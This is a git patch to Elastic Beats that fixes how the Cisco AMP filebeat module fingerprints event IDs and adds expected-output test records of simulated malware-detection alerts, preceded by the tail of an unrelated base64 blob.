YTRj45TyWqq7u1G1zcGlRHvl+HhkZMggvDQrD3Ow0oTS+x0rWkFRAtdnGXUfBizJmDbmuXvf+cmPADGJIQLLtwNv+wegQEqTa51FL3u0CcNo3cOwxshdS2SB0I3gwAbbADV2/2SV03Me0sP5cvqManIejvGeE58duNUXlyHHVi+WCmRUqNyWr/RQMdBRi5LzJdkVptOqeALuiwlydB8CzAJzyBryC9niiNbDwyKRke0Ze+iiwj9DlhA3b9dwhXcASBJLjRJXGZ3+Dyj8KzNuEpwYlPxI4AutIwDfBHhSCwiVAuzGNchVv+TIgJTcZZUnrh4annfgjd0zPqrtZ0JJ9Bgr/SKSE40+rgtyBn6VD1jb8AB9iO6qRxgg5fg/ZimVo3qmUCZGDGNK6SdX/wMYca8ykTRfBAS3LCExLw1keYNpFwLpDQ85pSjT9ejAiWFBNlo8iq4yDZARRFh7JsBLIkKndFrwEYocbEvYuhUdPC3R8DWjlZIGOHL4JMiAWejfETUQkc0UKvyYNYKwHCUQjrBAmH0q5AbLLPhnG6EzpeQ7CURNjf+HnLp5kRvCOF+1TNw18SHxriFxqwdqrPIIGgZD5kRAwopd3mukJaQU23Ekhux4SdxzTCfIo5/gIOyShBpuSgHBHZdlk0kZW0s2CUYsN2XJ3SkkqTQhWAdrh/cYRF7LDVNS4Ylgn7RqELi+dX9L2/EUiwW/unvJE30ikTf3g6yH82C9ja28L4yeBt0z0u9Ily7ZPFRtFUZsnPCYQk9dslx1D8pIkcRFqVOxbScdkuOI3xbpilRagRn6Dx+XHO04xJPAC9kVNylkFvkKUwY4DaFcOrgSHo4GqkEAT5VCG7eFSO3fMph/UU0UJS6VK3D9aMbeTcxsl1LoWaAUZLV9Dg/TE8fphwpqkuP/ERQXECciHZQV1ghnInCvC56RahEYsObLbOM0/hecJGP5NXCTA5FbYv6aZUIo9xTnhn5I6SqGYDRr5QRdO4Qmw3YcIizl9eE2Ts5mjBe03+SdIVRFty6rIWwXPDR6GFEyHr3RzDC5uvdunqN0JwYTwidi5jVAx7i52SF11SUoF2mIi+kyOlIhiKZGrkrjucMisgW6GI3bpSva7ETEck+hh2tE3kR6GAYdLjMEQh61q/xi727rVe2uW+jx64psyy57pezhdboMygDT9JjzPqDtCB4j5eEE0nTiiRgCCT69VMLqF7BU+ub7YYcsrP0h5nScjz4WdF0TNutk9H0ajdNTr2wa0Wky2ua1ka4pjlRRq5bbU+SgowGkdwuBGsKsXcjoPHgI7dBHni0jundfbKj9eNhNP2QqGBDTg8mzTmM91E4oA0obgTCAcLg66Xu1V7q5KR7Zy9aENrk/p0L1kt1GgGyR47XAuTrPY4/7t+yUKMNptmyw+SjnFSChLxjB8iPSY9jSNoGh7FW6qEEreenDl65U+pVkhO9EieIkuCOJxlZNNzHRjcceilJEdXrtCOq80Ew5681iOw4l5E8If85+/n779HzN5fnNy/QJVWa8mVJ1YpkUArvxYWJpYjeF2hXJAyyZRcWD7fN8MGRjDEpInsVd9V/ml31YVDfGPDIBxv6/JDrkkLaf13323L8AU6+mCnmvjbpTaYYZqG60/UI+YAzWiq7AhISKZpThqUVT0ZsmjuUwrvuL6+Ce65oNmWnkXam/CdzECovYq8vZnPJ49VZnPNddx3CGq7SsOX/dU4i+M3gLDjHDWmVZWR+V6aQMRMDBiEbYLWQS8zpHzuyqnm8o3Aos4/gdPtMjbB7QaW3ljRS159fzXLwWtgWX7Z3USer+TeCmV6lWBJUSJKJnHLsLbhriacbrCnhWu1Nj2d4Smrf4JMSa1s/kiLSwTVX55kRXAWWGpohNaTuFqsTNjtywuYQibogGZFYkywJllS243wY4fNrtWIdPLuRYk2zunmY+xwuCuY01cHBcM1/zLPW1Wn9Ck5DJM0morJe0vX609sRMr3DQyFzck1t9HzVV9xHWsDVSmfIoeAP1TzJPehMrS+1KqGXHkKtjgoaK1ZIaSGtxDfQcqIxrPYMPjUzn3rmpz6nWcbIdFLuLax3qJzzbG9L7h0l56rxGNOQe+NWa3UY4tsqOnuGCobNlpn3WUhEeCq3xZiXH1IhJ7AnD8igk7Vt+ZtQGr3F6YryEZMuw5Ekxzd9Xn/ikOlfSGLEh9GPbJMzNUNvMlygz/Afqx9lgtu6078PH0+0wmtiNCdGsERfSiK3CHoQqkJwRSqNyl+cauhN4DvTyEvXAy81kCWtukByS77tyzeOZ0XSBKg2B+iDa456KKYw5Smuw6x/xqvW0p0mRsY2dA8vVUiWnHvtWHVWvzw28mzbSI3U2DmIibMw428ERhvKM7FRSBUkpQuamt+c+eoEXZ7s8IIY8iy+Tc4Neg4dYQlPm2cIQpcvWtxCJYd3/A1Z4nSLPqlu49s6Apv3C2mDZ9eaFSYw2Ede+7apBahArRocMvMiDjhe9wHwVP93Kk2hnGfIvi7Z8RXqse68Vr32UAwUeg+a+84RxE6T1ztGqsvwda73StZdAenjXUCH1EzjsKsDBt29aRIy7TYMdsjfkGJ/8TOUDYQcCTha4QYkZ2RBufPVg3CCrn45LkaaDgJ2RxWKRcKtccD01L/QgrH22cam3fVSGulNWfuwtcbpKp+4BX6zKjAcDayj9nZEGfIypzzcBLGgd8OQDEWFcR9Pj5Bql+3Attg22k15v2dq5wDruG/fHqwLLKszZX581pCyWdFBK3VkboexZW3y+0Hk6eAzS2xbCyG38Tb8L6rA/N/2doypEOl2Ua/Uc9/TZNjyl5cAfQ9tJ1OJBlRV/dZ3UzV6ChLCtRTFMaIjE+V84Fw46Iy7NY21TfaUIwCOtrpj2nt4IfIC8219H+HawTh9a6+siTTPUEL5QviVAqzuYtcI7ZEfPSuywmxD4nZFX3yJlSPwa8nYFv1HiRldUJKhS6h7ts5BLyobMk9SIe7oiYLuv5M5sus39jNmY9p88G6zTTi8KDWo3EeOMN1/1z/US7gpO84dbX3yM/RxW1jSG8+BYY7dwfHNk2SRBG0m20Pb4GAdEfKZ8rWt7SMzhauuVi672FnPYiFk5e2HEPOHNyNb3uqVE/g4Vbwo4s4h2sEKs/Jez32FphQikibSRcqsY/YDFVj7XZMpT7AKGe1vAZaunD4w5FKygNvcghpwV2pjNCllKG9IC6YiMsHLcDZlAzr489QFHTT9sQvanfoIgoXca8JBtQpvnBj4wU5zreitJOmlyoTWqOwSU9QSdmTuR1gW1KuX7t8XDoWX7h8ur8nn9seMSH92niPnhNFzS0w7eA4e19aotQE5mRuIZkwqyhdEypG465DuSehqK/57We91z06AZNWXeNHaBs+VgrC2iHqlPEtMdvyubNzeHLuPkEEs2z/6GxkmaI0P/KTFishp/BFGZ3cZT88vYPTjC3QB6/tRI1JP1CxlhM8XRLrhn6SThbmjOS+JGjpuMbK14WbRZ6rVKXrnTtM/jvVKPrw1in+30S39w++toXeRZMr1364QJ0uhqd3AYoXVyAQolU7dVqi1lXbx8eGCZqujTYAaJLj0zljVOL2qv/EnpCi6nKKiotvfqJ56+HF00LKRJlSpMrjSCZAhWSqet+5xMRTAkEgZ1Qc62JS29Lwyi6NbCE7vkk6TZEjUncFdFPn5LaR27n6MWtLzOCQfLj134DguQpViyTrmi94PqTpHtheZLDFHD5fB2zSqWIDpHXEWdaTmBt8040raDxLI1p+QgnidkOj69vxvb2/QjXmn0Hs+Mn2lwTZSJfUx2H7cCD+2IIbSFUnv1FFO5MOEcNweZL6hc3W/zrpFGKSBuhGEjRTcoeUSSQdNIU+g5Fo86q4go0YD4KyxLieb8NnGco0ZzexB9CDRF4STdbXeJQiBY3dkq/piO9DJrxJIA8NeaV2ohMIM2iigYStjMCTFT+A20SX/v9xdW2/rNgx+36/QYwtkLbDbyw4GeD07OwVOt2Bb0UeDkeVEqCwZkhyn/34QdYkvSjesTgrstUWsTyJFURQ/MjJflOb25R92FFVNc9Y6cf8St8cRAkJ5Cn7PNRPTm+bSIZZegCyNea+Gt25kb8OfwmwjRyuL1lONy1bxS6RV5wB7BAQRIKj8bQCXle5AylnhjHOXmwqjIpATb7YXKtucDpbQ8/DpS/FbOPduJ8OnA8UqPY39L16zjZvncq9Ed64FKGIfZxn63KTO2LGdbye5NeTKgzDXWK0Dib2xo+7k8wRBZ2cjujNZsy8B66PkNqQL3IxJB3umMVOg7gShSlLWWndR/tPL8ER5hb4/p/X1C+8u7LGFtgPaKm2Jcuv7+ecil4KbXfal9U7p7eUTLKcEg1GIdQO+2Em2UMyvv/y+vl+TBzg0XFaprXderG5uF0/DHDVRPDGtMI3Z7F6bVnKf8pTFxdOzPcuxrC9H2HxvEn6c8tndjlGwLFjl+4+hSm9A8SpCcTmhvHOtgDjj5n/PG07EHFnNPcmldzfGS9wV+p2yG0O7arzFp0fdxpN7V8R0mRR1MOSDsVrJ7U8bAfRZcGNZ9eE2/G2V/stlzWj+XzXXrAeRdWRgIwa/ISArYhQ5oZaabbmx+sXd7C9pLFqwu1CsP2EgUwwzkBiUuhRMT4T2fC2q9KAKefInE3Im7SAn5RhxN1TddM1GMyGGt/m8po/wjNPvP+EWwB175z5KHsNHhwfrfJ9Mys3xyY3l9OK8AoWQQhLQGlL+fcVrpLHawThEM4FvPUHGyGvNeQEh4LgQtL8we4V2PlShPbvu2DKCRy771G9rwNIdM1nnVQlOX8r4Yjh/GHwDVCwOlB4jfWUKDyWVGOQmViC5IcUeuMB3smP2PfkWdzhs1D7rZY1wL7bGNlR9O0J3q9pAFYodRMSflCbsAE0r2Ir8oaDhcou8gs5iWajYUTWHfCMUfWZVubyGTLVBI73+SMIeasaGOcgBywkRfPe6CIISLqo5UQA9Ztfj91fujyHB3LKDvd3ZRuTwmB2UZgfffP/DEmg+swOp+JYZG+3BuOpDftvDvqyY9d1/F5Nr+mIIDVCq9KArDAFp+Z7rzhAmt1weG6wgs4VL0/qfZ81AB8sYT+LOewzKCUFa5RaIe1KA7EE6LRxUIyJX68fiOiioSc81rVYH7jw4hxuchbCdlgNaX5qooSDluH1vEkHTlhU3rTJ85rW+xfzie8aQdWgSXvRFEBFC9UdZUe0BSyA8gOid873WKsrxqnhYX7sZtqCTfsWzzzeFuU9iIzXDDIofCQW3ccmdYCBX7rucctXhWf4on6XqsyJ2C9J4DPP43X9ckfv6OPxq1kotjDbW1OJhfQqdoUovZkLwY1MkmAPqEHiHCF2KxE33vm7krzhh9lwIt9IbATJrxCuwQNmsLcAbYA/XL2nCR7BA7nAcb9IDGTDwQDvD9NfI1/c+iYa65jSH13cwnN6c3wA33IrTQZmeon2vbttJycTNV38HAAD//wF1780=" } From 2600f56d6c01ac5d1a87f9bb2c934fa0a0f65366 Mon Sep 17 00:00:00 2001 From: Andrew Kroh Date: Wed, 24 Mar 2021 20:20:03 -0400 Subject: [PATCH 13/20] Fix cisco amp @metadata._id calculation (#24718) (#24754) The detection_id wasn't sufficient to uniquely identify documents. Closes #24717 (cherry picked from commit 82a210aabb971ba2add1365b074617dc6d3cdaaa) Co-authored-by: Lee Hinman <57081003+leehinman@users.noreply.github.com> --- CHANGELOG.next.asciidoc | 1 + .../module/cisco/amp/config/config.yml | 20 +- .../test/cisco_amp1.ndjson.log-expected.json | 403 ++ .../test/cisco_amp4.ndjson.log-expected.json | 3386 +++++++++++++++-- .../test/cisco_amp5.ndjson.log-expected.json | 1511 +++++++- .../test/cisco_amp6.ndjson.log-expected.json | 785 +++- .../test/cisco_amp7.ndjson.log-expected.json | 504 +++ 7 files changed, 5981 insertions(+), 629 deletions(-) diff --git a/CHANGELOG.next.asciidoc b/CHANGELOG.next.asciidoc index 341fe104bdc4..9574394aea85 100644 --- a/CHANGELOG.next.asciidoc +++ b/CHANGELOG.next.asciidoc @@ -201,6 +201,7 @@ https://github.com/elastic/beats/compare/v7.0.0-alpha2...master[Check the HEAD d - Fix `google_workspace` pagination. {pull}24668[24668] - Fix netflow module ignoring detect_sequence_reset flag. {issue}24268[24268] {pull}24270[24270] - Fix Cisco ASA parser for message 302022. {issue}24405[24405] {pull}24697[24697] +- Fix Cisco AMP `@metadata._id` calculation {issue}24717[24717] {pull}24718[24718] - Fix date parsing in GSuite/login and Google Workspace/login filesets. {issue}24694[24694] - Fix gcp/vpcflow module error where input type was defaulting to file. {pull}24719[24719] diff --git a/x-pack/filebeat/module/cisco/amp/config/config.yml b/x-pack/filebeat/module/cisco/amp/config/config.yml index 0aa38440947e..888fdae449d6 100644 --- a/x-pack/filebeat/module/cisco/amp/config/config.yml +++ b/x-pack/filebeat/module/cisco/amp/config/config.yml @@ -61,16 +61,16 @@ processors: - decode_json_fields: fields: [message] target: json - - if: - has_fields: ["json.data.detection_id"] - then: - - fingerprint: - fields: ["json.data.detection_id"] - target_field: "@metadata._id" - else: - - fingerprint: - fields: ["json.data.timestamp", "json.data.timestamp_nanoseconds", "json.data.event_type_id", "json.data.connector_guid"] - target_field: "@metadata._id" + - fingerprint: + fields: + - "json.data.timestamp" + - "json.data.timestamp_nanoseconds" + - "json.data.event_type_id" + - "json.data.connector_guid" + - "json.data.id" + - "json.data.detection_id" + target_field: "@metadata._id" + ignore_missing: true - add_fields: target: '' fields: diff --git a/x-pack/filebeat/module/cisco/amp/test/cisco_amp1.ndjson.log-expected.json b/x-pack/filebeat/module/cisco/amp/test/cisco_amp1.ndjson.log-expected.json index 4a602ba1c2b6..6f6bb95e97a5 100644 --- a/x-pack/filebeat/module/cisco/amp/test/cisco_amp1.ndjson.log-expected.json +++ b/x-pack/filebeat/module/cisco/amp/test/cisco_amp1.ndjson.log-expected.json @@ -179,6 +179,59 @@ "forwarded" ] }, + { + "@timestamp": "2021-01-14T10:06:39.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "24:78:d8:fd:c4:75" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6533241347137077251", + "cisco.amp.event_type_id": 553648143, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "24:78:d8:fd:c4:75" + ], + "cisco.amp.timestamp_nanoseconds": 657000000, + "event.action": "Threat Quarantined", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6533241347137077000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850", + "fileset.name": "amp", + "host.hostname": "Demo_AMP_Threat_Quarantined", + "host.name": "Demo_AMP_Threat_Quarantined", + "input.type": "log", + "log.offset": 3885, + "related.hash": [ + "a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850" + ], + "related.hosts": [ + "Demo_AMP_Threat_Quarantined" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, { "@timestamp": "2021-01-14T10:05:52.000Z", "cisco.amp.computer.active": true, @@ -307,6 +360,128 @@ "forwarded" ] }, + { + "@timestamp": "2021-01-14T10:05:52.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "24:78:d8:fd:c4:75" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.Overdrive.RET", + "cisco.amp.detection_id": "6533241145273614337", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Clean", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "24:78:d8:fd:c4:75" + ], + "cisco.amp.timestamp_nanoseconds": 525000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6533241145273614000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850", + "file.name": "BIT4BBF.tmp", + "file.path": "\\\\?\\C:\\BIT4BBF.tmp", + "fileset.name": "amp", + "host.hostname": "Demo_AMP_Threat_Quarantined", + "host.name": "Demo_AMP_Threat_Quarantined", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 7800, + "process.hash.md5": "54a47f6b5e09a77e61649109c6a08866", + "process.hash.sha1": "4af001b3c3816b860660cf2de2c0fd3c1dfb4878", + "process.hash.sha256": "121118a0f5e0e8c933efd28c9901e54e42792619a8a3a6d11e1f0025a7324bc2", + "process.name": "svchost.exe", + "process.pid": 896, + "related.hash": [ + "a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850" + ], + "related.hosts": [ + "Demo_AMP_Threat_Quarantined" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T10:05:52.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "24:78:d8:fd:c4:75" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6533241145273614338", + "cisco.amp.event_type_id": 553648143, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "24:78:d8:fd:c4:75" + ], + "cisco.amp.timestamp_nanoseconds": 619000000, + "event.action": "Threat Quarantined", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6533241145273614000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850", + "fileset.name": "amp", + "host.hostname": "Demo_AMP_Threat_Quarantined", + "host.name": "Demo_AMP_Threat_Quarantined", + "input.type": "log", + "log.offset": 9301, + "related.hash": [ + "a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850" + ], + "related.hosts": [ + "Demo_AMP_Threat_Quarantined" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, { "@timestamp": "2021-01-14T10:05:50.000Z", "cisco.amp.cloud_ioc.description": "The Windows Scripting Host (WScript.exe) was used to execute a file with a fake benign extension prior to a scripting extension. This is indicative of an attempt to conceal the malicious intent of the file and to trick the user into opening it.", @@ -1228,6 +1403,128 @@ "forwarded" ] }, + { + "@timestamp": "2021-01-13T15:36:52.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "f9:65:da:22:2a:41" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.0B965CA8AF-95.SBX.TG", + "cisco.amp.detection_id": "6411132837046517762", + "cisco.amp.event_type_id": 553648147, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "f9:65:da:22:2a:41" + ], + "cisco.amp.timestamp_nanoseconds": 684000000, + "event.action": "Retrospective Detection", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6411132837046518000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.sha256": "0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960", + "file.name": "11179468.exe", + "file.path": "\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\11179468.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_1", + "host.name": "Demo_Qakbot_1", + "host.os.family": "windows", + "host.os.platform": "windows", + "input.type": "log", + "log.offset": 38602, + "related.hash": [ + "0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960" + ], + "related.hosts": [ + "Demo_Qakbot_1" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-13T15:36:52.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "f9:65:da:22:2a:41" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.0B965CA8AF-95.SBX.TG", + "cisco.amp.detection_id": "6411132837046517761", + "cisco.amp.event_type_id": 553648147, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "f9:65:da:22:2a:41" + ], + "cisco.amp.timestamp_nanoseconds": 682000000, + "event.action": "Retrospective Detection", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6411132837046518000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.md5": "84b6f7be5370c1998886214790c6892b", + "file.hash.sha1": "5faebef3bb880489195e80e6656ccf442ff7123b", + "file.hash.sha256": "0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960", + "file.name": "MspthrdHash.exe", + "file.path": "\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\MspthrdHash\\MspthrdHash.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_1", + "host.name": "Demo_Qakbot_1", + "host.os.family": "windows", + "host.os.platform": "windows", + "input.type": "log", + "log.offset": 39856, + "related.hash": [ + "0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960", + "84b6f7be5370c1998886214790c6892b", + "5faebef3bb880489195e80e6656ccf442ff7123b" + ], + "related.hosts": [ + "Demo_Qakbot_1" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, { "@timestamp": "2021-01-13T10:37:33.000Z", "cisco.amp.computer.active": true, @@ -1771,6 +2068,59 @@ "forwarded" ] }, + { + "@timestamp": "2020-12-25T05:49:09.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "e6:44:a0:56:f3:9a" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6525520937264087041", + "cisco.amp.event_type_id": 553648143, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "e6:44:a0:56:f3:9a" + ], + "cisco.amp.timestamp_nanoseconds": 661000000, + "event.action": "Threat Quarantined", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6525520937264087000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "edb1ff2521fb4bf748111f92786d260d40407a2e8463dcd24bb09f908ee13eb9", + "fileset.name": "amp", + "host.hostname": "Demo_AMP_Intel", + "host.name": "Demo_AMP_Intel", + "input.type": "log", + "log.offset": 53947, + "related.hash": [ + "edb1ff2521fb4bf748111f92786d260d40407a2e8463dcd24bb09f908ee13eb9" + ], + "related.hosts": [ + "Demo_AMP_Intel" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, { "@timestamp": "2020-12-25T05:30:44.000Z", "cisco.amp.computer.active": true, @@ -1844,6 +2194,59 @@ "forwarded" ] }, + { + "@timestamp": "2020-12-25T05:30:44.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "e6:44:a0:56:f3:9a" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6525516191325224961", + "cisco.amp.event_type_id": 553648143, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "e6:44:a0:56:f3:9a" + ], + "cisco.amp.timestamp_nanoseconds": 500000000, + "event.action": "Threat Quarantined", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6525516191325225000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "f2863a775c7faa85aefa3814530d9356ff700ae8bf534584652c2b4b720ee117", + "fileset.name": "amp", + "host.hostname": "Demo_AMP_Intel", + "host.name": "Demo_AMP_Intel", + "input.type": "log", + "log.offset": 56674, + "related.hash": [ + "f2863a775c7faa85aefa3814530d9356ff700ae8bf534584652c2b4b720ee117" + ], + "related.hosts": [ + "Demo_AMP_Intel" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, { "@timestamp": "2020-12-25T05:30:41.000Z", "cisco.amp.cloud_ioc.description": "PowerShell is a Windows utility that allows access to many Microsoft APIs within a shell environment. In this case, a script attempted to download a file or script to the local system and then execute it. Malware authors may use this to download items, rename them, execute and delete them with a single command.", diff --git a/x-pack/filebeat/module/cisco/amp/test/cisco_amp4.ndjson.log-expected.json b/x-pack/filebeat/module/cisco/amp/test/cisco_amp4.ndjson.log-expected.json index fb066a1b3377..3fb89dbd6159 100644 --- a/x-pack/filebeat/module/cisco/amp/test/cisco_amp4.ndjson.log-expected.json +++ b/x-pack/filebeat/module/cisco/amp/test/cisco_amp4.ndjson.log-expected.json @@ -228,6 +228,75 @@ "forwarded" ] }, + { + "@timestamp": "2021-01-14T20:18:05.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "02:2f:e0:10:03:5d" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.E4FCCBFA69-95.SBX.TG", + "cisco.amp.detection_id": "6412680266518626319", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "02:2f:e0:10:03:5d" + ], + "cisco.amp.timestamp_nanoseconds": 587000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6412680266518626000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014", + "file.name": "28242311.exe", + "file.path": "\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\28242311.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_3", + "host.name": "Demo_Qakbot_3", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 4969, + "process.hash.md5": "b5ede95ec8bc4ad6984758be42b152bd", + "process.hash.sha1": "f504774b72acfb23a46217aec9c6559fd7e4df64", + "process.hash.sha256": "e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014", + "process.name": "QuotaGroup.exe", + "process.pid": 7120, + "related.hash": [ + "e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014" + ], + "related.hosts": [ + "Demo_Qakbot_3" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, { "@timestamp": "2021-01-14T20:18:05.000Z", "cisco.amp.computer.active": true, @@ -295,6 +364,73 @@ "forwarded" ] }, + { + "@timestamp": "2021-01-14T20:18:05.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "02:2f:e0:10:03:5d" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.E4FCCBFA69-95.SBX.TG", + "cisco.amp.detection_id": "6412680266518626317", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "02:2f:e0:10:03:5d" + ], + "cisco.amp.timestamp_nanoseconds": 494000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6412680266518626000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014", + "file.name": "28242311.exe", + "file.path": "\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\28242311.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_3", + "host.name": "Demo_Qakbot_3", + "host.os.family": "windows", + "host.os.platform": "windows", + 